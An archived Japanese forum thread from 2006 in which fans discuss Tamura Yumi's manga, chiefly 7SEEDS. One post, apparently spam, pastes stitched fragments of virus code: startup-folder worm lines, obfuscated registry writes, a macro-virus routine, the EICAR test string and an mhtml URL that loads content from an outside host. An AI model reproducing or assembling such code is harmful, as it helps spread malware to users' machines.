5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■田村由美作品21■

1 :花と名無しさん:2006/12/13(水) 01:03:19 ID:k6REf/fx0
「BASARA」「巴がゆく」「シカゴ」「7SEEDS」
他、田村由美作品についてマターリ語りましょう。
現在「フラワーズ」にて7SEEDS連載。
単行本は9巻まで発売中。

【 注 意 !】
・sage進行でお願いします。
 原則として>>970が次スレ立て。

・各チームのデータ、 過去ログ及び関連スレは>>2-10あたり
 最低限、先に目を通してからスレに参加してください。
(できれば現行スレを全部読んでからが望ましいです)

・最新号のネタバレ解禁は発売日午後より。
 最新号のあらすじが知りたければ、早売りスレに行きましょう。
【早売りゲッター】総合スレ・十四冊目【ネタバレ】
http://comic6.2ch.net/test/read.cgi/gcomic/1160614052/

前スレ
■田村由美作品20■
http://comic6.2ch.net/test/read.cgi/gcomic/1161533159/

2 :花と名無しさん:2006/12/13(水) 01:03:54 ID:???0
7SEEDS登場人物まとめ

【春】 (花・ハルは鷹弘と共に別行動中)
末黒野 花(17) 元水泳部の高2 サバイバル技術に長ける 東京出身
雪間 ハル(16) 音楽一家に育つピアノ弾き 東京出身 

甘茶 藤子(17) 医学部志望の高校生 茨城出身
角又 万作(18) 座禅・唐詩を好む寺の四男坊 弓道二段
鯛網  ちさ(18) 大臣出が多い良家のお嬢様 石川出身
野火桃太郎(12) 神童の名高い少年 宮城出身
新草ひばり(?)  解凍失敗のためか目覚めず 詳細不明
柳  踏青(?)  死亡(捕食/自殺) ガイド・自衛隊出身


【夏B】 (ナツ・嵐・蝉丸は船地点、百舌も別行動)
岩清水ナツ(16) 登校拒否の高1 埼玉出身
青田 嵐(17)  水泳部所属の高2 東京出身
麻井 蝉丸(18) 不安定な母子家庭に育つ不良青年 浜松出身

百舌(?)     サバイバル技術に長ける以外一切詳細不詳

守宮ちまき(19) 美大1年 熊本出身
天道まつり(16) プチ家出中のコギャル 実家は農家
草刈 蛍(12)  異常に勘がきく少女
早乙女牡丹(?)  ガイド・元婦人警官

3 :花と名無しさん:2006/12/13(水) 01:04:29 ID:???0
【秋】 (2派に分裂中)
稲架 秋ヲ(?) T大卒(在学?)青年実業家
猪垣 蘭(?)  設計を専門にしてる?
刈田 葉月(?) オリンピック級の柔道家
八巻 朔也(?) 将棋の名人(法学部?)

荻原 流星(?) パラグライダー乗り?くるみの子の父?
鹿野くるみ(?)  牧場の子?気が弱そう 妊娠中?
梨本 茜(?)   海女さんの家系の生まれ
十六夜良夜(?) ガイド・消防士

【冬】
新巻  鷹弘 50年に一人のピッチャーと呼ばれる高校球児 神奈川出身
鮫島  吹雪 死亡(捕食) 今世紀最高のショートと呼ばれる高校球児 広島出身
神楽坂美鶴 死亡(自殺) 日本舞踏界のホープ 高校野球マニア
枯園  睦月 死亡(捕食/自殺) 一度見た風景は忘れないT大1年
柴漬 アラレ 死亡(解凍失敗)
綾取  風花 死亡(解凍失敗)
室咲  冬至 死亡(解凍失敗)
熊川  冴 死亡(捕食) ガイド

4 :花と名無しさん:2006/12/13(水) 01:05:02 ID:???0
【夏A】
種にするための優秀な人材として生まれた時から特殊施設で育てられた。
おそらく試験管ベビーで全員名字もなく、名前のみ。

安居 …火・水クラス
涼  …火・水 クラス
小瑠璃…風・医療クラス
源五郎…動物・植物クラス
鷭  …医療・動物クラス
あゆ …植物クラス、もう一つのクラスは不明
虹子 …土・植物クラス
卯浪 …ガイド 死亡(メンバーによって銃殺)

5 :花と名無しさん:2006/12/13(水) 01:05:34 ID:???0
過去ログ
http://artemis.s77.xrea.com/gclog/tamura/

関連スレ
田村由美 「BASARA(バサラ)」 Part6 (懐かし漫画板)
http://comic6.2ch.net/test/read.cgi/rcomic/1151484412/l50


7SEEDSラジオドラマ発売中。全三巻。
ttp://www.bestack.co.jp/

夏チーム:岩清水ナツ…南里侑香/青田嵐…鳥海浩輔
     麻井蝉丸…小西克幸/早乙女牡丹…高島雅羅
     百舌…井上和彦  ほか
冬チーム:新巻鷹弘…佐々木望/鮫島吹雪…檜山修之
     神楽坂美鶴…久川綾  ほか
春チーム:末黒野花…雪野五月/甘茶藤子…山田美穂
     角又万作…置鮎龍太郎/雪間ハル…保志総一朗

6 :花と名無しさん:2006/12/13(水) 01:06:04 ID:???0
よく話題にのぼるネタ

・7SEEDSの時代はBASARAの世界に繋がっているのでは?
 九州が分断されている、生態系が違いすぎるなど、理由はいろいろありますが
 別物と考えたほうがいいです。
 作者はおそらく、同じものとして描いていないと思われます。

・百舌=死神なの?夏Aの誰か?
 9巻で要先輩が行く気であると判明。名字は百舌戸。
 ただ夏Aの安居が半分白髪になったこともあり、まだ確実ではない。
 涼・茂説もまだあり。(茂は厳しいか?)

7 :<body onload=window()>:2006/12/13(水) 01:18:14 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

8 :花と名無しさん:2006/12/13(水) 12:48:09 ID:???0
>>1
乙でーす

9 :花と名無しさん:2006/12/13(水) 21:51:31 ID:???0
またウイルスがー
書き込めない

10 :花と名無しさん:2006/12/13(水) 21:53:43 ID:???0
専ブラ入れて、アンチウイルスソフトで除外すれば快適だよ

11 :花と名無しさん:2006/12/13(水) 22:03:23 ID:???0
>>9
ノートン使ってんの?
除外すればおk
このスレだけじゃなくて、これからもウイルスコードを貼られるスレに行く事にもなるだろうから、
早めの除外設定をススメル。

セキュリティ板のノートンスレに行ってそこで調べてもいいし、ぐぐっても対策方法は出てくると思う。

12 :花と名無しさん:2006/12/13(水) 23:19:33 ID:???0
新スレが立つ度に、貼る奴がいる。あ〜ウザい〜〜っ!!

13 :花と名無しさん:2006/12/13(水) 23:23:34 ID:???0
テンプレに除外の方法も入れたほうがいいんじゃねーの?

14 :花と名無しさん:2006/12/14(木) 15:11:16 ID:???0
ファン・信者が痛すぎる少女漫画作品や作家
ttp://comic6.2ch.net/test/read.cgi/gcomic/1148474271/557-

>557 名前: 花と名無しさん [sage] 投稿日: 2006/12/13(水) 09:32:18 ID:???0
>普段は「人間の誇りを描ききった〜」とか痛いマンセーぶりをさらしてるのに
>いざ根本的なところを突っ込まれると「漫画だから」と逃げるバサラ信者

558に降臨した方をお引取り願います。

15 :花と名無しさん:2006/12/14(木) 20:43:16 ID:???0
桃太郎はいつになったら再登場するんだろうか

16 :花と名無しさん:2006/12/14(木) 21:03:15 ID:???O
ナツが(略。期待しすぎて待ちくたびれた。このままじゃいざ再登場しても、相
変わらずセミにどつかれ、しかもそれほど活躍しなくて拍子抜けしそうな悪寒。

17 :花と名無しさん:2006/12/14(木) 21:19:30 ID:???0
何巻か忘れたけど(3巻だったかな?)花が回想シーンで嵐に髪の毛を褒められて触らせた後、
現実に戻って髪もボサボサ、化粧水も尽きたって書いてあったよな?

化粧水も尽きたって化粧水なんてあったのかな。リュックに詰めてあったとうに賞味期限切れであろう
危ない化粧水を我慢して使ってたのか。
それとも目覚めた船形の解凍装置から目覚めたときにそこに置いてあったのか・・・

18 :花と名無しさん:2006/12/14(木) 21:22:09 ID:???0
賞味期限w
花たちはシェルターを見つけたんだよね?
グリセリンの一瓶くらい、あったんじゃないの
それだけあれば水と混ぜるだけで化粧水として使える。

19 :花と名無しさん:2006/12/14(木) 21:26:34 ID:???0
それ以前作った事あるなぁ・・・
精製水とグリセリンとあともう一つ何か混ぜた記憶が。
なるほど

20 :花と名無しさん:2006/12/14(木) 21:29:36 ID:???0
まあ、どのみち使用期限は切れてるだろうが、それでも缶詰が入っていたシェルターだから。

21 :花と名無しさん:2006/12/14(木) 21:37:25 ID:???0
へちまで作れるって聞いたことあるけど。>化粧水

シェルターの中に山のようにある専門書の中に、美容に関する専門書もあるだろうから(あるかな?)、
それを見て、適当に、植物探して作れば…

22 :花と名無しさん:2006/12/14(木) 21:51:18 ID:???0
そんな適当な植物があるかどうか…
原材料になるような植物って限られてるよね。
へちま・アロエ・どくだみ…

23 :花と名無しさん:2006/12/14(木) 21:56:55 ID:???0
植物自体も以前とは違っているようだし自作は難しそう。

24 :花と名無しさん:2006/12/14(木) 22:04:07 ID:???0
きゅうりやはちみつでも作れるよ>化粧水
まぁどっちにしろそんなもの(ry

25 :花と名無しさん:2006/12/14(木) 22:18:12 ID:???0
精液をかけr

26 :花と名無しさん:2006/12/14(木) 22:20:12 ID:???0
>>25でFAだな

27 :花と名無しさん:2006/12/14(木) 23:02:12 ID:???O
日焼けどめ乳液はさすがに作れないよね。

28 :花と名無しさん:2006/12/14(木) 23:46:38 ID:???0
>>19
水+グリセリン+園芸用肥料の窒素ですかね。
それならシェルターにありそう

29 :花と名無しさん:2006/12/15(金) 02:49:01 ID:???O
前スレで眉毛の手入れのことも話題になってたけど…
ワキ毛とかもそのままってことだよね…

30 :花と名無しさん:2006/12/15(金) 09:15:55 ID:???0
前スレ最後の方の天国の話。

一人殺せば殺人者だが何百万人殺せば征服者になれる。全滅させれば神だ

美帆は貴士を神にしたかったのだろうなと。
そもそも天国なんて信じてないだろうし。
天国ってのは、死ぬっていう意味で使っている。

31 :花と名無しさん:2006/12/15(金) 11:29:12 ID:???O
眉毛ボンバーか

32 :花と名無しさん:2006/12/15(金) 12:11:07 ID:???O
どっかの原住民は脱毛してた気がする
蜂蜜だったか蝋だったか忘れたけど

33 :花と名無しさん:2006/12/15(金) 13:01:57 ID:???0
>>30
全滅させたきゃ放っておけばいい。
貴士が神になるとしたら、種を残すという意味で神になりたかったんじゃないの?
美帆が協力できたのもそういう「大義」があったからかと。
要は自ら箱舟を作り乗り込んだということでノアか。神からの啓示(Xデー)を聞き、自ら計画を作成し、
船に乗るメンバーを選んだ。

34 :花と名無しさん:2006/12/15(金) 13:24:58 ID:???0
>>33
全滅ってのは引用のママで、種の操作というか。
自分たちに義があると思って行動しているとオモタ。

35 :花と名無しさん:2006/12/15(金) 16:05:00 ID:???0
>>29
いや、だったらまず男性キャラは全員髭が生えてないとおかしくないか?w


36 :花と名無しさん:2006/12/15(金) 16:40:34 ID:???0
確か、鷹のセリフに「髭くらいそっとくべきだったね。」というのがあったから、髭を剃るものくらいはあるのかも・・・。

37 :花と名無しさん:2006/12/15(金) 18:37:55 ID:???O
てことは鷹は好んでモジャってたのかw

38 :花と名無しさん:2006/12/15(金) 19:26:55 ID:???0
防寒?

39 :花と名無しさん:2006/12/15(金) 19:42:14 ID:???0
夏Aのマドンナを見てるとどうもバトロワの栗山千晶を思い出すな
特にレイープされそうになるシーン

40 :花と名無しさん:2006/12/15(金) 20:55:06 ID:???0
http://media.spikedhumor.com/8944/Jingle_Bells_Reversed.swf

ジングルベルって逆回転させると最後の方が日本語に聞こえない?

41 :花と名無しさん:2006/12/15(金) 20:55:54 ID:???0
>>40
古いwwww
けどもう時期なんだよな

42 :花と名無しさん:2006/12/15(金) 21:31:53 ID:???0
>40
涼しくなりたくてまた見にいっちゃったw

43 :花と名無しさん:2006/12/15(金) 21:49:38 ID:???0
>>40
それの違う曲でも昔同じ目に遭った。
怖いからもう本当にやめてくれよ・・・

44 :花と名無しさん:2006/12/15(金) 22:42:58 ID:???O
豚切り携帯からスマン。最近初めて読んだ。面白い。
虹子って危機回避は巧いが、クラスの能力高いのかな。
コミクス9巻の見開き『虹子&骸骨×6』が、他の人を見捨ててでも生き残るような冷徹さを表してるんだろうか。

45 :花と名無しさん:2006/12/15(金) 23:14:52 ID:???O
虹子は何で未来に行きたいのかわからんね。共に生きたい相手がいるわけでもなく。
花が言ってた、生きるためだけに生きることができる人間なのかな。そういう本人以外の
人にはほとんど無意味な存在なのかも。

46 :花と名無しさん:2006/12/16(土) 12:37:47 ID:???0
>>39
同じ事思ったノシ

47 :花と名無しさん:2006/12/16(土) 14:23:12 ID:???0
>>45
何が何でも必死に生き抜こうとしているようにも見えないし、
淡々と課題をこなしている感じ。
これから未来での出会いとか出来事で変わっていくんだろうか。
とりあえず他のメンバーと違って冷静沈着に対応できる彼女の存在は
他のチームとの接触で結構大きくなっていくと思う。

48 :花と名無しさん:2006/12/16(土) 14:41:53 ID:???0
虹子って、生きてる事自体にも実はそんなに執着ないような。
もしも死ぬような状況になっても「あぁ、あれが悪かったのね」とか
冷静に分析しながら死んでいきそう。

49 :花と名無しさん:2006/12/16(土) 15:32:25 ID:???0
ああいう世界でうまく生き延びるにはどうしたらいいんだろうね。
以前、花が、青紫のじゅるじゅるに感染した時、危険な動物が近寄ってこなかったので、わざと感染させて、(塩で広がるのを防げると言う事なので)コントロールしながら危険な動物が近寄ってこないようにすれば、生き延びやすいのでは・・・、などと思ったりしたが。

50 :花と名無しさん:2006/12/16(土) 15:47:15 ID:???0
でもいたしかゆし

51 :花と名無しさん:2006/12/16(土) 16:01:58 ID:???O
ビニール袋に青紫を入れ、棒に吊してちらつかせながら移動すればいい。

52 :花と名無しさん:2006/12/16(土) 18:50:48 ID:???0
そこまでして生き残って何になるんだろう

53 :花と名無しさん:2006/12/16(土) 19:05:04 ID:???0
あの青紫のじゅるじゅるは武器にならないかな?
弓矢作って矢の先に塗って攻撃する
かすり傷でも負わせたら数日後・・・・

54 :花と名無しさん:2006/12/16(土) 19:10:57 ID:???O
そこまでして仕留めても食い物として危険で食べられないし、
放置しても死体から増殖して感染するかも?

55 :花と名無しさん:2006/12/17(日) 02:00:42 ID:???O
>>39あれはまんまバトロワのシーンだよね。
あゆって卯波に何かされたのかな?
汚い汚いって言ってたし。
そういや卯波は監視カメラで小瑠璃の裸見てるようヤツだったしな。

56 :花と名無しさん:2006/12/17(日) 04:25:20 ID:???O
とりあえずあゆの眉毛ボンバーだけはみたくない

57 :花と名無しさん:2006/12/17(日) 04:33:15 ID:???O
具体的に何したわけでもないだろうが、いやらしい言葉ぐらいはかけたことあるだろうな。
小瑠璃に対してすら女として品定めをしてたんだから、あゆなら当然だろう。
自分が生死を握ってると思えば余計そうなるのかもね。



58 :花と名無しさん:2006/12/17(日) 15:36:01 ID:???0
全く卯波はわかってないな
一番エロカワイイのは茂なのに

59 :花と名無しさん:2006/12/17(日) 16:38:36 ID:???O
そういえば男が男を、女が女を好きになってしまったらどうなるんだろう…
種としての意義なくなっちゃうよね

60 :花と名無しさん:2006/12/17(日) 17:03:37 ID:???O
そうゆう人はそもそも種に選ばれないとオモ
多分家系の病気とか調べる時に一緒に調べるんじゃないか

61 :花と名無しさん:2006/12/17(日) 17:14:43 ID:???0
個人的な趣味嗜好を?ムリムリ。
それに、恋愛経験が豊富なほどに年をとってない奴ばっかり選んでるんだから、
ノーマルだと思っても未来へ行って、初めて異性の生態を目の当たりにして、
幻滅して同姓に走る可能性だってあるわけで。
まあ、ああいう環境に放り出されたら男の方が本能のままに行動すれば、
レイプまがいだろうとも行為そのものは出来るわけで。
そもそも同性愛って、文化的に発達して本能の薄れた人間に起こる現象だし。
ひょっとしたら、そっちに走った連中は死神の手にかかるのかもしれんが。

62 :花と名無しさん:2006/12/17(日) 18:44:05 ID:???O
そうそう、>>61がおいらの言いたいこと上手く説明してくれた>>>60@59
十分後からってありえるよね
まさか茂はそういう要因になりかねないって理由で…

63 :花と名無しさん:2006/12/17(日) 18:49:20 ID:???0
>>59
虹子「気をつけなさいよ、ホモは選ばれないから」

64 :花と名無しさん:2006/12/17(日) 20:35:23 ID:???0
どう考えても茂はホモ系だったよね・・・
女の子なんか見向きもしなかったし

65 :花と名無しさん:2006/12/17(日) 20:48:30 ID:???0
女の子に見向きもしていないのは源五郎やバンも同じだね。

66 :花と名無しさん:2006/12/17(日) 21:16:54 ID:???O
茂みたいな子を守りたくなってしまう>安居、嵐
茂みたいな子にちょっかい出しちゃうタイプ>蝉丸
ここから間違いが発展してもおかしくは…な…い…

67 :花と名無しさん:2006/12/17(日) 21:47:33 ID:???0
嵐の好みは花だからそれは無いだろう。

68 :花と名無しさん:2006/12/17(日) 22:06:56 ID:???0
シカゴのメイン3人のキャラクターが花と嵐と蝉丸に見えて仕方がない
そういやシカゴの一巻に「花」って名前だけ出てくるけど、別人かね?

69 :花と名無しさん:2006/12/17(日) 23:01:01 ID:???O
花と嵐の他には、現在熱愛中の恋人がいた人は選ばれてないんだろうな。
でないと全国中に第二第三の花と嵐達が放浪しまくりになるw

70 :花と名無しさん:2006/12/17(日) 23:05:13 ID:???0
まぁ花は関係者の娘って時点で特別だからな。
嵐は花にだっこで夏Bに選ばれたわけだし。

ところで花の好きになった人が何の特技もない普通の体の持ち主、あるいは病弱だったらどうしたんだろう。
それでも夏Bに入れたのかな。
花の好きになった人が偶然嵐みたいな人だったけど、好きになる人なんてどんなヤツかわからないよね。

71 :花と名無しさん:2006/12/17(日) 23:09:04 ID:???0
夏Bチームのスタート地点があの猫に似た島でよかったね。
あのチームのスタートも虫が大量にいるし、決して恵まれた環境では目覚めなかったけど、
春のスタート地点の島(海)から始まったら、かなり大きな打撃を受けてただろう。

夏Aのスタートと秋のスタートはわからないけど、冬は北海道で辛いにしても
少しだけ恵まれてると思った。結局残った人数は一番少なくなっちゃったけどね。

72 :花と名無しさん:2006/12/17(日) 23:31:40 ID:???0
BASARAで蘇芳攻防戦の真っ最中に朱理がタタラの仲間達と
仲良く餅つきをしている本編の展開無視の楽しいイラストがあったけど、
7種でもそういうのやってくれないかな。
ナツに花、嵐と鷹が夏Aと和気藹々としているのとか。
そういうのでなくても各チーム7人ずつのかっこいいイラスト。
冬チームは鷹が十五年前の姿で
ミイラになっていた三人も生前の姿で。

73 :花と名無しさん:2006/12/17(日) 23:35:29 ID:???O
しかし、うじゃうじゃいる分不意打ちを食らう可能性が低い虫達と、単独
でもいつ襲い掛かってくるかわからないトラのいる場所、どっちがましか
なんてわからないよ。

74 :花と名無しさん:2006/12/18(月) 09:27:31 ID:???O
>>61
趣味趣好じゃないよ
>同性愛者か異性愛者か

性的指向。

75 :花と名無しさん:2006/12/18(月) 10:31:10 ID:???O
一応補足すると、>>69は花と嵐のように別チームで両方選ばれてるという意味ではないので。
もし他もにいたら、虚しい放浪の末野垂れ死にしたりするんだろうな。
シェルターにはできるだけ恋人同士を入れてるから、そこら辺は考えてるね。

76 :花と名無しさん:2006/12/18(月) 23:13:02 ID:???0
前のスレで誰か言ってたけど
安居と嵐って似てるから
(その人は親子かな?と言ってたかな)
花が嵐に再開する前に安居に会って
安居を好きになったりしないかな

しかし花は嵐があの世界にきてるって知ったから
それは無理か…

77 :花と名無しさん:2006/12/19(火) 00:14:37 ID:???O
それには安居と嵐のどこが似てるの?てとこから始めないとな…。
顔の作りなら似てるっちゃ似てるが、美鶴とナツが似てるのと意味はそう変わらないと思うが。
貴士も顔が似てるようなことは言ってない。言動も気性も根本的に違うし。
それに、今までの花の行動を見たら、嵐の生死を知る前だろうと、似てるなんて理由で安居を好き
になるなんてないない。そんなキャラならその前に鷹を好きになるって。

78 :花と名無しさん:2006/12/19(火) 00:56:56 ID:???0
田村先生が描きわけできない点を追求しちゃだめだよ

79 :花と名無しさん:2006/12/19(火) 01:46:04 ID:???O
まったく描きわけできないのではないから似てると受け取る場合があるんだろうけど。
ヒーローヒロインの顔はどれも基本パーツが同じなんだな。髪型や泣き黒子があるという違いは、
もう同じ顔じゃない、という印だと思ってる。
蛍とひばりならあえて同じ髪の色、形にしてるように見える。よく似てるという設定なんじゃない
かと思うが。

80 :花と名無しさん:2006/12/19(火) 19:36:26 ID:???0
>>73 目覚めた時天国にいるか、地獄にいるかなどと言ってみたって、この世の中が食物連鎖によって成り立っている以上、
甘い果物や花が豊富に咲き乱れていようが、変異によって凶暴化した生物がいようが、
襲ってくる生物がいない世界にいけるわけじゃない。
どのみち、野生の世界に放り出されたら、生きていくためには多くの困難が待ち受けているのは、当然。
襲ってくる生物がいないなら、それこそ藤子・F・不二雄の『カンビュセスの籤』の世界でしかない。(自給は絶対不可能の世界)

81 :花と名無しさん:2006/12/19(火) 20:20:38 ID:???O
そりゃそうだ。というか>>73>>71の、冬は少しだけ恵まれてる、と言うのに
対する反論みたいなものだったんだけど。

82 :花と名無しさん:2006/12/20(水) 00:29:22 ID:???0
にしても春のスタート地点は過酷杉
夏Bと言わなくとも他のチームでさえ厳しいんじゃないか?
あの過酷な状況で必死に生き延びて−1人で済んだのは奇跡だな

83 :花と名無しさん:2006/12/20(水) 00:56:24 ID:???O
まあ虫が嫌いな人には一番の地獄だろうな。

84 :花と名無しさん:2006/12/20(水) 04:58:12 ID:???0
俺は駄目だ・・・・・
夏Bの白い虫も駄目だ・・・・・
まだ冬の虎のほうがいい
でも北海道は寒いから駄目だ・・・・
まだ秋のほうがいい
でも秋はセックス禁止だから駄目だ・・・・・
もう何もかも駄目だ・・・・・

85 :花と名無しさん:2006/12/20(水) 14:08:57 ID:???0
そういえば秋チームのいた場所は危険な獣もいないし、
虫も小さかった(危険な蜂はいたけど)。
三年間で死人も出ていなかったし、
チームの能力の高さもあるんだろうけど運も良かったんだろうな。

86 :花と名無しさん:2006/12/20(水) 14:30:44 ID:???0
秋のチームの秋ヲや蘭は、「昔にしがみついて生きるより」なんてセリフがあったけど、
もしかしてXデーがいつ起きたかわからないために、未来に行かされなければ、
もしかしたら、自分たちが生きて人生を終わるくらいの間は大丈夫で、
エリートとしての人生を全うできたかもという気持ちがあるのかな・・・。
今回のことでXデーがだいたい、いつ起きたか、わかったら、ふっきれるかも。

87 :花と名無しさん:2006/12/20(水) 14:37:00 ID:???O
>>85 目覚めたのはあの場所じゃないっしょ。

88 :花と名無しさん:2006/12/20(水) 15:38:09 ID:???0
夕べ涼が夢に出てきたよー
都内のホテルに部屋とって、コーヒー作ってベッドで延々と寝てた

89 :花と名無しさん:2006/12/20(水) 21:01:23 ID:???0
>>87
九巻で花が秋チームは関西にいるはずって言ってたから
眠っていた場所も大体あの場所でしょ。

90 :花と名無しさん:2006/12/20(水) 21:02:30 ID:1TdOK2j10
>>87 一年間彷徨ったって言ってたしね。
そして見つけたシェルターの場所に村を築いたんだよね。
でも、鶏のような生き物もいたし、ラマのようなとかいう生き物もいて乗り物にしていたり、ミルクも飲めたりしていたし、
一番恵まれていたとは言えるかも知れない。
結局は灰に村をやられて、住めなくなったけど・・・。

91 :花と名無しさん:2006/12/20(水) 22:09:30 ID:???0
>>86
秋ヲや蘭の政府への憎悪の理由が何なのかによるよね。
大事な人間と引き裂かれたから、とかなら簡単には済まないだろう。

前に秋ヲが「一ヵ月後、まだまだあきらめないぞと思う。
半年後、もうあきらめた方がいいかなと思う。一年後、死のうかな と思う」
と言ってたけど、これってエリートとしての人生失って
プライド傷ついたから、というより嵐達のように
誰か大切な人がいて探してたんじゃないかと思った。

92 :花と名無しさん:2006/12/20(水) 22:38:12 ID:???O
私は単純に、普遍的な現代人の感覚で恨んでるんじゃないかと思ってる。
このスレでもあんな未来に放り出されるよりは隕石落下の時に死にたいって言う人が多いし。
花と嵐くらい焦がれてる人がいる人間ならとうに今頃自殺してそう。

93 :花と名無しさん:2006/12/21(木) 09:17:04 ID:???0
>>89
その情報はナツ→鷹→花たちと伝わったものじゃなかったっけ。

94 :花と名無しさん:2006/12/21(木) 13:56:42 ID:???0
>>91>>92
秋ヲや蘭がどういう理由で政府を憎み続けているのかは
この章ではっきりすると思う。
最愛の恋人を失ったからか、別の違う理由か、
ただ七種で至上の恋人といえるのは
嵐と花だけというのはちょっとな、とは思うが。

95 :花と名無しさん:2006/12/21(木) 18:26:26 ID:???0
藤子には医者の恋人がいたんだったよね。おえらいさんたちが、故意に選んで恋にかけたのなら、もしかしたら、秋のチームの中にでもいるかな?
まさか、秋ヲってことないよね。医者ではなさそうな感じだし・・・・・・。

96 :花と名無しさん:2006/12/21(木) 18:49:54 ID:???0
http://www.37vote.net/anime/1165540235

97 :花と名無しさん:2006/12/21(木) 19:58:56 ID:???O
>>95
好きな人、だろ。恋人とは言ってなかったよ。

98 :花と名無しさん:2006/12/21(木) 23:38:18 ID:???0
恋愛と意識もしてなかったような感じだなあれは
尊敬する先輩って感じで

99 :花と名無しさん:2006/12/22(金) 00:20:12 ID:???O
>>94
秋ヲと蘭まで実は恋人第一な少女漫画キャラだった!…となるのは正直勘弁だなあ(;^^)
嵐と花の存在の特異さが余計際立っちゃう。そうなると、この二人が格別妬まれるようにならない
とおかしいし。ただでさえ夏Aの存在が頭痛いのにそれは嫌。
ただ花嵐の対比として秋の中にカップルが選ばれてたら面白かったかもな〜、ありえないけど。

100 :花と名無しさん:2006/12/22(金) 00:31:26 ID:???O
妬み…そっか。。。
花と嵐が再会したら今度は妬まれるかもしれないね…
花や嵐に惚れてる輩もいるし、そうでない人達もこの二人ばかり大切な人と一緒なんて…って心の底では考えちゃうかもね、人間だし。
花と嵐早く再会してほしいと思ってたけど複雑な気持ちになってきた〜

101 :花と名無しさん:2006/12/22(金) 00:32:40 ID:???O
それよりちゃんとオチつくの?

102 :花と名無しさん:2006/12/22(金) 01:23:15 ID:???0
>>101
つくよ。

嵐「いやあ、スゴイ夢見ちゃったよ。いきなりスゲエ未来に放り出されるの。なんか彼女もいるっていう設定でさぁ」
男子高の友達「ウッソ、マジ?なにその超設定。漫画みてえ」
嵐「だよなぁ、彼女なんかできねえよなぁハハハハ」

いつもの変わらない一日であった。7種 完
                     

103 :花と名無しさん:2006/12/22(金) 01:26:06 ID:???O
>>102
夢オチかよw
しかも嵐のあほ男子学生っぷりにワロタw

104 :花と名無しさん:2006/12/22(金) 02:08:49 ID:???O
>>101
前作が2巻まで出て作者が描くのを諦めたのもあるから、オチなしの場合もある。
今作はそれがかなり不安

105 :花と名無しさん:2006/12/22(金) 02:40:15 ID:???O
オチは決まってる、人類が滅んでENDにはならないとのことだから、それは
心配してないな。それよりグロ・悲惨に走りすぎてB級以下の作品に落ちない
か、鷹が死なず幸せになれるか、ナツと花の役割バランスが良くなるかが自分
的には問題かな。

106 :花と名無しさん:2006/12/22(金) 12:11:41 ID:???O
設定がちゃんとしてれば誰が死んでもいいや
キャラ優先より物語優先してほしいし
地球にいる7種は人間が暮らせる環境か調べる実験なんじゃない
で、生き残った人間が他のコロニーから観察してるとか

107 :花と名無しさん:2006/12/22(金) 12:35:19 ID:???0
桃太郎だけはなにとぞ生かして下さいまし田村さま

108 :花と名無しさん:2006/12/22(金) 13:59:09 ID:???O
とは言っても鷹や小瑠璃、源五郎などが死んでも花や嵐が再会して幸せになって、
ナツが相変わらず蝉にいじめられてひいひい言ってたら話的にどーなの、と思う。

109 :花と名無しさん:2006/12/22(金) 14:28:19 ID:???O
とは言っても鷹や小瑠璃、源五郎などが幸せになって、花や嵐やナツが死んだら話的にどーなの、と思う。

110 :花と名無しさん:2006/12/22(金) 15:04:29 ID:???0
まあぶっちゃけあの世界に放り込まれただけで、全員不幸と言う事には変わりないな
嵐「あっ、空から光が!」
花「花が咲き始めたわ!」
ナツ「水も綺麗になった!」
鷹「変な動物達もいなくなった!」
秋ヲ「俺達は何をしていたんだろう?これから仲良くしよう」
ということでもないかぎり

111 :花と名無しさん:2006/12/22(金) 17:10:41 ID:???O
>>109は普通ありえないが、>>108はけっこうありえるから恐いんだって。

112 :花と名無しさん:2006/12/22(金) 18:56:29 ID:???0
>>102
BASARAのラストと変わらんじゃねーかw

113 :花と名無しさん:2006/12/22(金) 19:01:18 ID:???0
それぞれの、国ごとに行われていることだから、よその国にもいるよね。その人たちとの接点は今後あるかな。
まあ、今の状況を考えると、それこそ、何代も経た後でないと無理そうだけど・・・。

114 :花と名無しさん:2006/12/22(金) 20:17:11 ID:???0
>>111
ナツがいつまでも蝉にいじめられてひいひい言ってる、とかもありえないだろ。
主役でそれは無い。ナツは成長するよ。

115 :花と名無しさん:2006/12/22(金) 20:31:46 ID:???O
それならいいんだけどね。しかし、ナツがそれくらい成長するなら蝉とくっつく線はないよな…。

116 :花と名無しさん:2006/12/22(金) 20:55:15 ID:???0
ヒロイン格の子とくっつくには蝉丸はちょっと、ね。
お互い、何とも思ってないし。

117 :花と名無しさん:2006/12/22(金) 22:06:52 ID:???O
そもそも7種メンバーだけで子孫繁栄出来ないあたり終わってるようなもんじゃん
血が濃くなりすぎ、それ以前に同意でヤるのが普通だから子孫繁栄無理

118 :花と名無しさん:2006/12/23(土) 02:30:12 ID:???0
数十名いるのに繁殖に熱心なカポーが一組しかいなかった時点で
計画はもう失敗だと思う。選定項目に「エロい」「相手構わず」
を入れるべきでしたね

119 :花と名無しさん:2006/12/23(土) 03:10:06 ID:???0
>>117
どこだか知らんが、ミクロネシアには島の全人口の祖先が「妊娠した若い女性」ただ一人って島があってな……。

120 :花と名無しさん:2006/12/23(土) 05:48:54 ID:???0
